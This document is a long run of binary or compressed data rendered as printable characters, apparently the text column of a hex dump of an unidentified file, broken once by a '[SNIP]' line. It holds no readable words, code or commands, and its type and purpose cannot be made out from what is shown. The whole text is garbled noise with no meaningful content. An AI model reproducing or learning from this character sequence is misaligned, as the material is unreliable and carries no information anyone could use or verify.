...L....%..'+......[9uJ.".KT#....?._s.|......|.*....L...kbp7Xy...Vc.W./f..1B......t..E+7...3....    ].......i.9.^^#.u.k9...T..4P...Dc..mV.3..X.(.....5.y...4.A.k.P.....W.....VBq.2....I........7......... o..cl....d#.|....\.......4R%...[J....s.    .5......=.p...wc1xk...(9.    ..d5.......    ..S.........xF
.
.?j.yiN%.i[..l}....13.Qm..^........D..........mY....
>...n5 ..>T....x.W4....e......~.O..._....v..6.....=....u.B.B@.!.:.=.y...v..D...9PE..\.q..~.E......6.Y.J......N,.;.~.X.x......:e......9..?..k..4...@......8$.?_.)....~....q..!.....B.1......0......[..=+...G6.....a........$.......0..._.Q....@U.6....yy.9. .c.S...}d..Z.C.d..@KX...D.`.5x.9....(..........<4.PD......j....=....oi....e.}...C.......#.I....M.,}..+~5.....1Xo.d..r*..#.r.!.}.....c...U.p-q.$Ki..._..'.4..-n.=.mYH.....L
v.+.b..W.X..y+..F.:....4.^#.I~.h..Do.s.`.o18.K#...Y.y...q..J.f..(.q*ny..Uy.Q.E....p.j...-..P..$?.T.......}.......o-.EL....Q_..|l..O=.....e.......I..`.f.)6H...10a..+R.."..?..P..$...Qm.....N..:.....K.."I..Z...e.    8..].zR..........7...7.........R....Aw.i....5...q....G.....A....d..Y...9m............E....x\6
5`.x....W.Xp..Vc...@....T#.I(..e..g...d.zK:G79.{.
......F.....@.6.n.......:.]......d[.}..y.AS'.j_.8.E.>..&.bm....&.t.Y.N......_K%.Ja.).q*TS%y.K
^/....g..c..R...K....W..p....`.......w,...`D?;..3;....s.|...h.....k'....2....V...0b...$.p.}....
.k..=.O.8..C6...}....^E..U.7..vOg;.=....3...]..j).2
&.N.3j.[..iU..ci.;zo.....O..    .)^T...Ku.D...y....R.R....    j..n.d.U&...V.r...._..*:4-KS..    n...=.....Z...f~-....y..g...`.4!...h^B....-..Z...z.r.9.):N.^..o..w..    .cJ.....RD..^..L.'...RH7URMJh....X.,.T.@o...>O=..:.Y6b....1......s..5:n.5..I.....K.e>..lM..K..K.![.a.q:.Q.27....e..E.S!.....QP..6.2..k.:j..4R..........}^s.W..G ......zw.S....hqw.]MW....~..?.d....3...n..Sd...wX    ,....'[.}]Y(j."u.c.Q..M.G.c.7c:_.......b.=c.T.@....f....cp}u..4..+`^...\....+.i........=T
...@%[0........=.c..m.Y\...y.rr>..d..K.....9o.t..?f.5<J.v..Ft.`..;.......Zc.....y....<Mp......>Lrp.uZ\3..
..._....B..@....X......zFh.jO............^......\^    ....6...s.r.ea..1.Z.<A.j......6.FT..0.....:i.<.t..~...c...U..1{.5Qr...R.xjJ>^h.~<.k1/.....y...V.j....}. .O..L....^......`.=...T...f.q.a..(SI.Iy".dp-.a.m.Ws.A..v......0p...I....^uB>.a....'...10.Y2<...m.}.&+6..O...bA....$.....K...........B.f)...-.......Ss.P......me....}.W2b.~..E....1I.....W.dL.<}b.=.T.t.^.Y...8.V.6...(...S.....^...1e....@@P..|T<....l.9.....zZ.r...4.Q.iB.t. g.....}...n..>2]..P`v..O.V...d..N. ....h.....r.5..4|n.....a.O'r.......)..#9..m4.....%.r...$fK...Swyc!;.mHK.O.2
-&A[..
.=f~......L{.G.5......#Wjq.}.K..q..jz...    I
0..t.,...+.q.-......1r~.#.53..3d.*_u*.::.6sd.-.z:w+C=....M.....j<q.M.z.f`A2..+.GB..w.o.q.....8.+....o.G........9...Ik..C......zT.oM..f.;.7[.............Oz...;V=.-^RP.{.j..M...O...ks...".U1...@am.d,........AKF
]g..?$..zJ....jX.........P.r(G...)..%.g.."...4...t.C+..2...A......M.T..n...:....n|e..>..b...x..=b.    .X.l.'#@gx?.c.A.jt...{%O...rU|}........j.QE.i..7Y.....i.o3RO.k..S@..@..P.(...H..0....k:.r(.w~..m.L.<+V.._.wS...6......d....b."...L.*P!.fM#2..V....9
./c..[.........F.......z..5k...y.X.S.!....@#...............x..
h.:t..F..e...-.6.l........Q....^./.JP.2.,s.J.[W.a...ul.t.Nm.....Y.}...M...>0M...&o.jB... ........S..c.Q.F4
V.....~\..1.....j....@".~.ph.{..rJ6..L...E.........+.4...%.x.^.8GK.Hbk(R.b\.....<.....P.d...v....0..*........~bMG...UV.x*ky.|..+..p.e.d..i.a..g.(.].t.l..e9...    .&..eI
|... &/....>..b.......&..0...I.....w....3...+d.jS...3..a...R........I..@.F..b.........F.c..W_H..<.~..\......<.I..........W|9+`...U..B...G{.f.......D ..'RW..Z...fB..l.O.T(...;02........F..g.9...RW.6.CO^..U O...'......]..Z.oM.f.....oGAC..j/xU.jR9W((@r.@\.*V$..UW.
p.,c..`<$C.\.'kW l......U=<!.)s<..h.z....?z...&...o`...\}?.....k.0...FI.. .TD6.{r...d..=...-4=P.Ax.r6......].a91...~Z..\L....!...W.xp...If...1.i?....F.G..f..D?R.......\/..q.;TS.....O@....U...h0...V...JY....}..U....`w..Ga.....
QW....e....o.9.o...U..t....1!.RVE..|T...x.xP.3&.2~Ihu..!.._....o".nb..&k..
..K....'>... ....CU."...d...\.k....CE2}.1.........b..M..[F.=}...1:.Q..0.b.YJ..wNu.p..]....b..z@]6.3U.....I#..{+.^].t&[9@.};..n.s[.B...B#P.h.~="4H...BQ.Jy.N.k..K........<..c}..t...-....3....._4.+...w.......(~...6.#./B.~%...c$.N4......4{9.:.....m.l..s..?.~.#..r..J.D....T9.~W*Qa(z5......=1L.4.k.H..f
..*Y..&...}q,.$...L.3..9.P/.Y...
.:ZH..)..{[k.......s*.z.....a.u..    ..v8...9.....)H.iD+...TK..=.~..^.....L../9.6.}.1./3=......v..........o=.V...Q#....$.........":.#......#cp..6..s............H\...@#z    t...t...cf....a>.x.4    ..p...7..B....y...../..    m....|.Zow)SN.?..BR.5( }..qJ.,;.L.>.....F...:..XX_SH...1......8..j..G.@.dK....P..+..\^e..#jQ<..7..|s.T...P.Z...iCz.Z.......<...8..AqJ).."......Y...h....k..I.Y....}.....|+...U..F....x.....w.$....a.W.l&.>.b`EJ8........SH.m..n.....V-....A.....4.p.....8.\.....J...%..9..U..t8nY..7....8WE..B..x;...Bl..'..sw...,Y_...........r..........SH.....DB_h,..[|.11......HZ..o.....3.....O5pRW.......:7m9.....F.UZ48p.HW.?..E......1..C.....|..w.3...*._..@...............    IA...ZJ#..PQ){[.k....a.3
>.........u>...w..v.    Qg..~.?........k..H..(.&.....,..cW...8.`.......\s".$...x.HH.[..&.H...).L[BG.D....~b%.....}.Q..>..Y.1HP..
{...Y.3N.R.h.
.......m-......T.8..~.?..._.9?.k.g...)...'-.&.........^.lp......$...|_V..%o....X.../<.......b....Pi...N.)3    .eQ.ws.4Aq..-.7.b$./.}
...9.s.+7...\.*.W0I..jB.._S.~;...N    ...!5....I...X......=|.....W!...r.`=...e.@.........[Q.k..]~.M..G.....w0...+R.|Zq}.O8........?a.........e.0E#.]...et?.S....!KW...>.z....G..ZB.I+p:.2..#..+..CQ.u...r].^E..im.jUu.....2.g?..W........!...VaU.............X:aG.L'.d...%".....9.......y...N.hk.8f....1..W..!tJ.....C......s..eR./GV..{(Qr.c...d.j6.E..'...\..gv..x.jZ..\.-D.q..f.!2..U.-k@,    I..|.........b.}v..]....w......B.....r..v....wj...S.    .{a.....SM'.a.....*..2G..,W..w.o}.c.....?z.)..B.......m>..L..S7...$.kO]:;..g.N.F..K[...1....2.%.....G...t'./.~.#n|..R....E.S...X.........B2E.._.K^....e....BH..,....S..z.DI.'f.?.A.p.J...)S.[.    6.P.CL.
..H..p..0]9.xip..3
i.x.....:..r.*..../!F..7..A..."t...(f(.h..V..KF<..i0..@.....=H..t.#....:.U8k..\.)..>3..z.K....x......1.xe"...~..........kV..........#...f.....H:Pt;..h...e.....?..5.p.....k8$x.....B........A..>..(.C."1*3,M.".7{...&hFg.......80.Zr->
...I.|.[.k......h....>....A..-<....Z1A...D3...m[.'.......K...B!\#....W%^..1T7z...h.0.Kl..%.;.|...IE..O....MH..Z.n.m.t.J*.....<-S........i...}y.....N..L....._.|H.l.........ddd..v.5(c2...=...h.(.....;...U....#..s.+._....X.....}...#S..^
i...Wz.... I.\n.9.^IPEAMy...~.*..<^.r~.T..3.RL..i.K..?.n..B....7.Ef.|..w..D.....*I...^..(..{....+.k..cDf...L..v...l....-...}.O.tm....Z..D.\}.9c5.....H...q.p.j..].[...j....;...|..].vU.}.o....'O2Ews.....$.....>....7..G+.O@.l.@`..d[%......T....(.Y..$.P....-....n[,.~f....=.8.4.3...ej..L.;.'.N.&..1 ?......X...()-..HB...Y...\.`.}l.i.o...}9.b..*V.W..p..d.5..~Q/XC...C.x9..`...-.&.(.0...4.a...+.>...4..,K.Y..eQT.8.m'.<<.
....Y....m6.......^    ..........$..Y[.....ZU.,.p. ..x..G...X..N...].......s...... .:..m.L3'.....r.M..lc.XV.{U...
....R$9..o.<.:g.O......1.4.d#..l...gY8D....;(..nm..H....Up..5....,2..c.u...R..k>..J..+JT;..n}T    ...B......./.....s..u.(..}..\........2q.l`...5.<.....q.O?....D.a4cl... HF3..    .....9u:..;`..P....D..%\v..C.d.. d9\.e....L..K.2....%a...E..e.Pop....p..)..`;...dQ]....g.wZ....(.ryGi...K..V..U....>...?.....t.....&##......4.....!....A./=...ii........@.pjp..e._..$..Q.f2..=d.)...C...l>..&E...}.......{H....37?h...t.P..7......J...+Nchrv"..#..X.F.xf......0f).[.......t.9..e.7#....* ......x..|R>..[...mp....&...h...m.h......5..2(......    O.......&..I.....p.[Q+.!./J._!..}(..-.J.S^_..[.9..2...].
Nrx.........59.5.>.....%....."...w
...M..J...W..\=b^.....p.5*...$..oz....t...k....h..k.#.(.{.T..8....R....(....;e...wg..pf.t#.z.`.`.......S...ge+I3c...e....&.x..ghF..........V/g.d...].5...At..N.Adv\i..50..,    ].c1.......,#...2o.wZ..<.~.J1.J.;....0u.G1...h....:......).q~%....m..^...s..Nt..b.F.V..5......QkH..@0^.4..l....$.....11.>..-...U..O..AO.C(l+wV..B.?.Y}/...Qz..(..(.hR....@.c.CZ.S....R9&..].d.........4l:...s...G9.
?{....KG..B......z.....om......)>bE......6.....$=...$.z..Y!..g`.f.i.....9.F{oiS....Q...B......A..q...:u...#..W.".P-fqr.2.k]z........F.HR|8MC..e_.q.    ~....&...N.......i..Q.._.
..P.2....J.....O.U-OEoY.VWG&.<.....D.S`..."`.9......R.yB.9>.}.M.t.s.........lG+.aT0..v.....^}...    .z...HH..T......C...K.dMp..@..5..Y..I/...B. ....E..7...).\.k<K.%..i...<..s.....3.|..lP0...M.._..K..1Z.78\7.......<z.........+E...<.,....cp.    ...U:. cAO..<.`.M..-Q......r....l.^..N...A.!C.pk!hl...`L.V.$r.q.....1.....+..T..$..].....z....V[.W........._f...........`
V.-g....h..^t?r....,.}+p.!5.0...    .W..K...R...Gx]...O.../.*...M@3.^.j.*v..Z?..y......@.....H...'....!...4......+.CKv.t .I.._....!......O.Qv.Q.....?g .n..*.wf...?..f..-}.4...............Q^......q...7a..,B2#_..t...$.....&.{4]......y.>l..
...Rr...H8.YI..E.(.i...@[. .!X@.D)....F..d..XY...s....,@..xz....z6.........+]P....-.._........X*-W~...{e.`..^./|Y0.`:>..".....9.0...U..2.K............<.Vp...J*.#@r..-.....]..uv..1[TP[*f#...3..:...h...C...c.2.<...s.N.h5....C;..}......n*....O...t/.rQj.lq.u..g..N.......F9....J.-.Gc....{....../.......2..n..=h..N..........-m>vEp.....    ../~.......o+...'..h...RmJ?.^7.}).ai....>..sK80{..a.k.xJ....u.k:..Q;Ff...)...4..5....E    .Bd.....R.."....H.....~.i...uh..p...i......?.n@....M8...........a{4.......92...+Hj....&.`.    ...B
Pd*.'.......sg.....8I@....r%Jo)..ea.....KA9..}..<.l.....t....x..Y........-#.^a.c'.......&x ..\.....w.f._l..i...$.4@.......W$NKAy..R.a......3....q.... .A#.[>..4.7Gr>q.........?.'K.A.H..S.t..E.?[.)./....X.?.K.p....YVb.4..i.E.r.~...K..a.d.M y...`.|".J@.z.b..L...DPc.    ..}G..v03&..q...N.J'.0g.0.P.....i..B.7.!g..;.h...Afh....,..;...q.|.>/..G...18....z.z..tG.~J.....j*0...    .i..I...oR.{._..tj#9.U.........*....8.]0..e.j+0l6byCB..?..m..}.e+...)...B..%*..g...4u..l...j.D7.!.4t.....|p$R...c..3.p.....,2,.lno....f.A.} ...G.Y%.|.......wR..."....Z..K.y...eH..6......{ ...P.........X...9x...8.RhO...m..s.....,.u...P.|o..#....\.i..y.5...z..i<CmFB....-..T.S.}.!.Y.P.....Y......3...7K.m|.n...t.Q.e.Vq;...wF.E......zq.WM...H#m.w......bf*.YM..f..V....L>.Ix.^J..........X..674C.L.a....N6BRxVlj.........5Qg~^...%i%..H.v..6)A.0.I5.DT....Y...l.r.mX..r.W(.2...Jm..k
.......    .y..U....$..@...n...a.j+...
I^.r.{.kO...D..1....9d.T.q...L...W..q1.
N....H...J.Y........".."$?.A...h......l..5........8.0.....k0.L.w.L...G.Z..[..........=..H...VO.l..=U.?.a..X./..SA+.x.L._lO."..
...[.KU..OVw..I.Ss..(..X@..)J.....v.?h.2f.V.e_.
..J.......yP.."'...wzA$...d.4(.8.....[1..(......6^...x@9.UWt(..K....<d1qg..4....
"jF...7S.@..
]..v..f'...VN...s.S`k....'....Tx..=...i........v...7e=.J$F.#.........)..D...D..'N.K..[uv
...WL.$-......R.d\\.........1.r......^....l..".T..F.X.Iuf........TF...Sy...QW..a...>.aX..7g...."a..x...P..u=....T.#C.@~ .0..]B.7    ojf.^...`Q[k.*).$....==6....K.D..V.....*;:K.................}....    I...o.Y...%4.v.*9..T.....s,B^4..K\.O..4.v...o`.. S.c.....%.Z.......Y4rr.0..R...@p....M.{;..]...p.m.....o......._..M..;+.#U....P5m.t.t/.@.fS....u=r@M....b.r..8o.......1.7.1a....w{v..^....c...|..6t........-...H..Vfk.3...L.z...5*UZ"...K.k....2)..w0\..L.@.....%.vy.....>...l...N..'... r......n.~..%
5...p...,b......5|9 aF..)HN...R..?=b...7..OJ.%\...<..H6.Y...7...}.H.U%...:....D.p.....,..)=.7.......l.9..#..h.W...X...5j...P..n..q84.p7F4.j.    V..J....b..\.12.J:S...Z?c..?.&.......    ......Ch;.;.....<.Qi.....P*2..U./....^`.. )...]..4...b[_.K...T...PM[kM......,K.2.?)....4...%....a%......OvD.
O.(....8:y.=M..y.SRv..^    ..u.r-.4.=(6)I.B..D9..+...d..a>..x.8.g.J..M....w...m...s..K-.....$..2.8...*5a...    |.{..xJ..f.y..J...N....e..c......._`.O.U.....n...M.^...Y....`<i..u...(......*.O.I..?........m....nN...m.......1...e..@.5..........6UW./.[..?....q....-.;m.7.$.c)p..G.M9Vp....SH..R"u.b`.:...x+..]z..f
.`....Nw.Q.vj.Y    .<qu.hv*    ..5..,..~..M....p.N`...Nqv.1ScR...li@_-..\:.2..h........C..L<.........hA...w../.........    kO.f\.C5..HN... ....F.......%V.&.....[vf;.j}.q..w...:i..dA...T[{..k.[)...=b.8.6....h...>.J..+.j].T.W}..|J...O.6......^..c.$..w..7..`......f.....1..}..`.|.xE.o.<R..{.o..0....q...P}......2....su>.wK..K.....l..G'DT..Z.[...78.oa.
....@...,V..>.L.G...52.[.}A..bG."......Qd...R%...[..._....e
.......A..4..H....a...b%8....?.V9.v[i.OUO..i}=1g...O.../..M.0!.A.<.&.....l..+..x*i'...o...%.!.9to...:.7ta
=h.7s.!.\.z..+.O4.........W..d...5[&.....phx..R...Lhd_......q..kZ.'...4m..C..U&r......f..//...`.....oZ..]1...).C....ix.....4}.    ....D...s.Y...a...].......$..LWM....g..2...O||..c..2@(..v=.T..c
l...8..B..LjS'+.e....J.#.AA...P......Xs2?.}.........r%.!r...XU...oZ.9.uP.....+$..X.;......DT..)..W.6|.=<}.3Y..zh...TG...)Y.4FrW.E...D"o.....HZiN..T..<).....-f..4.*"?.{.d.NwiC{}kHwf6%.k..TJ.....&...&. ....8"x..x.....96W.iz'...f..q_    
.Y.......1..%8.....l....A.P..~......7...\y..A'By.
"...........TAn..W.......s....d..S...m..?=....z.-..\.1..an...Q[.|-..G......[..R..Vd..    @E.rYg:.>U..0.b......:X..37.4FR..+M.......=..x.Y%..(M..kL..*!U........[. .zV,.?.}......^6]F../...j........N..H..    .............=..K..!..$.!..%..6?t..:(.\.{..~Z.G(.!..\.....2.-......K.&;[Y>...0..H.......fm6..p1e..Be....RU..,4..Q..%....
.....-].....:..[b_v.3.%DO..v.c.4.@Q:..).m=B..X.......9J...4!q...V........,.KS.E......i.."...F26
....c.B5`,..|    #O...<,:.g.j.?{Q...DPyi...^.>.*...]V@..2`.\..G3.]=......=...Z.    ....Q.<....'d....{._..Hw..x.......X.h6.W.]......*I.r.Q..5h......2.D.x........z.q..iD..2,.b......O....4..8z2..........8T..~CEC...zE...a.f    ... .x.............E.p...&..2~.......    ....
0..X...~?}..z....kWLN.t\E.E.W...l..9.@...=1c.x1.'F.....2.D.d'..
...1.M.T........h...EKN.^..B...T...q...o.2.._<.....Pd.X....X...}.C."m.!...O0U.f..1...-]..R..-1..Z...    ..O..&..*..z..0/..u... .%Q.....l..P&......./g.q
1Irt.....[.@.d.|..}.M.k...}......8......>&..i................    .
........$..Y.....4.-vP?r..~...^i.u..pp....Z.    .. ].y..bf..t.....La59J.
-.2..T.l...(WB..v.av..2l....eo..-....^..%t......@V=h..vf...R8%...F..k.-~.......,.L...P.......5..O.q.....!z.Y.. ..1....*j.@....(.l=..r..|....E..:.L....h.u..<..p...xs....O....S......n.B..j.+1.d.S..B..6.>.+4./...!.6.L....Z1.K3c~.|..#..J.....a.}.I...../..U..4enR..[q0.3&....
.D .........o...P..4.L...|K.kU<h.AL..<.w.....[.>.<Ob./.K...!/..k.....Y=..
;....tiP..Ljo.."Y....VEh..^.y....[.v......%.cr..G.SJLH. ...'......{.9HL(:.Ty...........fn..s. ......n^../..H..qv...G.#.Z
.6M..e.&.].....SvLpN._.............0v...D
..".r=F.u....G.n.+..3.;!...K.....D...n....Q.W...5;./..n.p(.Hg.x.E.:.>?.B..g..D.&x....._...TIj]0...Ss.<n...    f..t#.....
..ii    
c.I.)....I...?. .....e.....3'M......}.~?..>Rm.'y..CI5.ZD.... ...c..]..........q/I...<...0.F.A[.V..Qh..s..&.....2.Q....K........0&...|g?..=.......U_A./N...a..BbrD/E...7...    vq...... .......&,..J....A..G.@|.....:..&.7..A.J:#.>...........1V.W...0*..!D....&_i/.....uTv.........tH.a......*....Co.o........K......h.B.....ME.S.J.J..,..q....X..{.....^GN $..Un./.. .Uv^..b..s.W,.    .....~2...d......*.5[.c.......w.
...^........g.......t.t......O9*k..,X.'M<MJ    ^.9.l...."1.....B.G.......4~..v
....y..|...#R.........9.7.f..../.^..V...).6.!...KQu.r..Vs..6.....k.r.`.../.V.oH....*.^...H..."..B...GI.A.....H...b.....l}...>......5.5r[4p+...^.;.n.on<..-s.*..z..B`..-...h.    ..'0.....q0...R.iN........S.X.5`.'....5Rb......).E....@.]..'......(..]..)Oh..i....\....*."{...3.B.\Y;.<.....X...~.......f.QE..>jV.v..o..j.!......0x.daU0....t`.{...\.....6w..V`Y....I?Y;....x...Y..g1...'..".6/....o.-k.....@y.e....u.w8,..{..:....yk..J@.2QpO.erBp.b.FDLaI..Q../..[.39w...h...N...x2.V.8b`.N=.y.6.sn).y............?.........W.g=m"..[.8.x...r...$W.#,...C0.]R.5..;........r.H)..)...c'.....Q..Xq...L...=!.6........Z=...........XY...mI.:\lXc4.3.5-']..8........m..n.C.....Np ..,......S|.#t.iPg....JY...*......b1.F....Tz/JA.P$b.j....p.y....p...iQ...+...h.....|(..n...y..Q...C..|.D....E[(..J...Ddx..H.w.3........%,...........//m.$Wuxe2T!....q.....-..(.a-.yA.....*....0qV.......V\...>...3..y..O5..,!.K.L....(st..K#.V.S.29n...P+./........n.pd5U..p.%O......3....R...$Yk~..Al..u<.l...MW....../....+.@...P8.H;.N]..Ew%......e...OS.......b..N.`.a>.v.f...U......v.........o.U..P
,.a...#.Z...(R.........'......s.".5{.U.9.Y3$.c)..*...xAsd...JW...]Y.*.J.S..o.....w....Q....a.........._..
.....,...P.E.l.......M)......I.....>s..pQ.g.)....c.U..~...B[(O1....M7w    nEx....k..O9..X..C.eF{...D..._.X.....d........R    .6Gf..-M.lF....W?.R...p.g[...t...j......C..i.SZ.%.gF..Z..A..w..*Y.(.....)..d...X..i...A...[....*...9=...3..........    ..i.....2.k.U.a.uU@Qi.#!.~4..1..h.~jq.F..*@..K...C.TQ.ef.;.....C..<?.[UM.P.b.,...sE...KZ.TQ#.t$.U."....O...f.._.....H....4....
.    .........$..Y[.^......n....Br......X...R.v.l.....^.v.!G.K...;..5...6.AIj.....0..j.UX..i}g.D.%.*...".~X..J3`....O,{*...>...b..`E........G'.kel.j....v.!.pm(....>..X..d['..A)`R....u.0.j'...B..!......J<GYr.....yD.2o.q.p.O.....}N.u,..
..5.BT.&../.P..UP)..{.C.3L..0?.(.#..?..G_j...........w0...^..c....+Bv....}J2..^...k.D.5..h%....j.......[...
.Y..65..;.....H..k.....rK.....~v ..J.c..)H.. ....j.~.|...O.5T.Q.4sU.w.D.....Jz...... ...D...    .<.....z..........s.A.>....m...1-..S.if.l?..W....E.x/...;...E....3.K.Q.q..H..-JJ.:..6K.@...f.........OW.F4b....cS.R.m.8...J=c...`..hiv.uJ...........}.?..{p...V..G.
..V}.8K6.....sz......C..:.P...Z.............l2....
.j.*...{..G....9.UC..2...M....v.S.$..igu.F.    3.[O...M...j4.6........N.KW.......^-.....i...7..(.>)..gA
(j..D.Y.......|...].{..:S...[.[y.F.d.|.'..-e\^Wn#..S..g    dy..l".u.Qp......P7....@
..DKQ..E.dTg<gOp...:./..~N%.'....!.......8    .Z..u.3.H..`v..Ha>.b2).c=y.$.
.......H.h.fY..%o...#./...k..Qa....i.lW..    ....*W._........9.....l...eo...i.c..\.e..........L.P.....4    ......I..}.+-.t..I....}.$..5.r.i.......w.[1{b.UW..Ep.5.^..Ia[1.......0GW...+{..........R$&\)V..q0.u....    .M...._..(!.z..:...4\5.......X...0...h...ALx7.'.X..C(.    J.9.|..Cc.S'..H.....    .$8..-{=    `...~]........;..}.....<..a.e..\.d.Z..d..2C..Y.sH..r.H.];...T...P.V.....}....p......6F[....g..`.*.0.....R.......
4...f....J..>....n....*...[.<..M.2..}.}`.......]".5..2..ijV..(.... V.....KK.Y....Xf..    ....s.`N...M...%:.fD......_M..x..,.W...e..'.)...{. ......Ue..g.s.=o....F.>f....E.
...:.K$51......@...='..l.^4..z.....f-.....Q5.c.`....j."...-...X.......P...v....Y)..D..=j@....-...........Dx(}.a..d..e...q...]...f.IVe{..]...,.cmo...(...S...u.J.3.A.K.3...J......3..hk...t..I!.3.H...b-X.<.D.H......g/W~c...e    r./~#.#.XY....E.......H.6I.F.'.    ...x    |XQ..0..d..GvR......Jp.8..P...^k...uT.%.3V^.[...\.B.).....d.......)%.z!..NB..T...........#......w7..M...j....o..........+..$..uAt..<.
.................cQ.a3...i.E..tD....T.(b.l../.=.m......Z:Q'!....C.o.3G.........,!1..!..U..T...N..:9.m.1...CR?..F.%.n......    .3A5
.aD...g.:V..Ss!.A....l)ka0yM,..a......'..fI..{.....]\....8.<K...:..o..J.)...G..5..LM    ....S..e....M..4...~..I.Zn[.J.dx...E../..by....b..o.........O>n...A.8..
.6.IoU..Z...t..~Z3..#.s...f.I....@..v...Yk....e....f...F.....n."..u5:...'....>...D........Ge..xG..L...C]..'.L.(o....H+.......'.dp....B...f.6.op..ol.P_......f..i.]Uuu.8.R..w$B....=e`Q.Q^..'..^6....N..*@.p.6.GsRp!..{.+u..o..&...
w..^.x..v    ".f3@k7..).......B.]...FI...........-..f.s...".T..i....%Gb.+..D..ef(...X..-.h$V....R...>b4.@.....h7;G.w.B..-.D..b.&..e.x..=,nb..Q!..;0. ....g.t..."....m`k...c...O........W.........{...%    FM.`.o&...g4D5.-hk~A.&.......>..U...Q........B.....2%..)....O....
8...,.C.wp.B......Q......Rg....].m.]K....GQi...D.LE....HFQ.5..&..).:..t..$....2....Wd..4.}...m.A.......z...;#....6..A.y3&G.D.A.H}.$R...`.......[.......)}....2\;..0.D.&...DMC.k.6h..G.We.m..|.?........W.'!...@P%"V.[.ra.]..M.;2.....3}.(..r.(........C..ED:I^..r$.L4..1.1.]n..g........b ..n.^B;H.q..fS..Fn.xO...e]...... .......T.X6p$.[m./M.i9....\ ...a.y..^(..nWt..R.....7.8ZC..
..?.c.Y.m.Q.h.O...L....hW....'h..$....$....x..L. ....5V\.f.......2..D".5!yl...)J ..0.z.}8..}S.-J.6..&f...%....z98....W....F~....#IP..E.E<S    ;..:.......P9...L....Y.....B$..T..E..3.c.U7E...R."[.a%cv..H....2Qa..@M.b^0..."U[.w_c...F;gXq..1.....hj..K..A(<>...8..3J..c.._.&k9|
7..s..-...8F..V.,......R......    ....    .....$..@n..
.....m{.8F6....IP=j-...>Qq..i.'.TL.Ge.....n.A'.....&j...Y. ,....y1>Y.*.gb5.......H...A4...........p{..WGZ...........}@x..7..(.{.6(l9..~.D..{c.B..O....g...*5..b..h.....N...T.G...C...5(]*..>.....;[...=.#.X...h.~..'..*....g....P<......b..Md..D.3>.. T"Z..P@N..    .......s...J.C...;...n.D..sc.Y.4..c.....w..
..".Z....    .0r.dN...._.....3k..-il$.0.Z..`$..O.j&...|...+.....e?>
....E>
...[SNIP]...
<7@...Y.`...%...Y$..W...R'.f)^.0.vK....&T.].Z=.=.PnM....&#<?.g..bY.P..............R.%..|s..b....;.......J.fH..RT...`K...j..
.z..>Gf............A....inm...9a{..0_.yP.+..V...I....}........EaI!....M.6..q    ....eC.>..`*.lS!0.8...t.......;|;5..PIm....'.......x.a.......&.f...<......HV...a..-...Y.Q./Dom..4-....p.b.:87...k]t....w.e...%...^....`...w...S.H<.(..<x.......3    .
G..S....$..@.N0.u..~...`D...C.qr..
T........ts.1.j...."\>..[5..9.M...q.'.+.....{`4.{...]$|......!./..ST..:P%..T..S....jta.[@,Y....w{.(..-..UR5..>4Z....^.;..kK......e......A.U..h,.L{...+.2..D.#%..i.n..rXI.1..\a7f|.:?.?J..M..i4..,...x.R'-..G.bS...(.z.A.g2..eOE8..s....U....`]./.Cz..3.$...!.=...?...d...+.;..?{@u..j@..q.
.$.&...<....3......6~#..nl..vwHr.uMoa.&UT..;..)...8.;.i .C.~r..K.    ..*%C..vf.........W.L .0.4Q3t1M.k8.b..........>5.....v{.M.w.mH...@
...m?v.......H9.0.[{8.;.7.xl.X...oSz.~.>..A.0..........~.0..0..b6..C.90.s...^F......~..a9.x.j......2.7<..G.....f....&....=...}{.u9;s.{..O.='...dG...M.DQ.gj......Z.....+......u../...6..~...
...Anmte6.a
.5.r8. %....\...bf.1Cg..........Z..!. ....|.5..J..0...enit......{.=.R.Xb.YT..4)r.m*/5.._.460..*t..N....E@.
...9...Q..;3v.}D\..<....M.$....\.C/..-....xg.gzh)....8....D.}.....'........|..:{...H8!...$...el.0g..I...f-.G.....'Zo..[.H...L.....2...n..s.$..{...2..@.....1h.........@.....!....,..z..f.BQ..,6G....J.'......q......"....Q.V...d`...U.C..vZY...C..-_p.    .yN.oBBq@G.s..L.&L....o.O......p.8....3.X."....5..m$P....:.w.x.....b.........].]Ef..F.bDn....u..Z.0
n..".....T4.D....P.!..i......Z.W?9........n..L>h...o..ei..4...\.....l.8..v3t..]..5.k3......X....]6..->......\....$.h^Qmk.....|..q..........e[.k.\2otO4......7..F....y....A..1Iv'.K.5.OP..d.+_...o...5....JS..yI."...+`    b.t1..B....z~.`...5Oa    .....}...6....I....5...3.*.GM........S.X.'Q}...[.....mQ...b...C}..G..+..XL6"e..2.|y."....W......7.....%\&.}g.........._>............XY....b..k.....%^....-.V?......J...j..\..<...L0-.......<.<n......@..{!T@...Q...    [Y.....F=..~F.,P..*.wG\.n...m......@..8_{.sw.x>.....[H..>W.o.o.............D.s.......5
1 ..m.r...D.........|.....!..........8..E...9./.)..g^.Wn.>.....e.\.Zl>.rR1...!....}m..#..d..sWi....Y..h*............(&%.!j.... ......j.0w/.p.f....p;B.TB..,0.D.G.w.c.W}..P....;r~..K.d..|...d....z.F.6.....d.f..........:.tLD...q".@(........@WY...q..9..?...]t@....L..5.../..E.o..g.W.[._6Q..V'...B..H.+#M..rE...{
.{K.8..s$U..`W.51d..MJ..E...u.J..D... ..a..=.Z.....1c(..Y$.f....ty..*m..<3(..s...;8.*.5<...gd..$..x@VR......CA...:...(.Q..........u}H......4A...{.@.B...NRh.~;.a.H.M.I..[.h^I.9&....W..$1R..{...'MA.....,/V..`..j3....F.d.Q/...^)..0.m..... ..Z..    T..X..o.......Xds....XF..M>.[A.....Ta...I........_.1...l..v:i..sO.w..v....p....v....u..-(..O .A..1.*>!..J.n.....1f..M_d..9..Q3......=.....J.j.......R^=u...........x&..Q.
.b:.H8kcIl.Q...N.$...N.u.BL..@....-.?.'.....
`....t......u......".=....D.:.v.7Uu......._v.....&..E(..Tr.."7C.x.......j...O.........!.1::#o.!..R....h^...sA;...1...z(.$.5.../<gL....!..nL....%h.9.FO..*.C<\[.T..kr......\S.....)....T....&9.A.v..W<+..E.U......
R    .
k.......$..@..*.......D.Q......8.OfRQ)......X..2...T.m.......Q.@.#....Wm;..rKIv.....W.i..b!By.]!e.d.Zq>S....K..P;<....Q7,._......a@7.`Q.......Z    W.N..b..5jl#Z.z.T    J.3..?.O....O.u....8..O..#....!%.[<.g....@.DX.H.{... ...$.(Y.....H@......".8
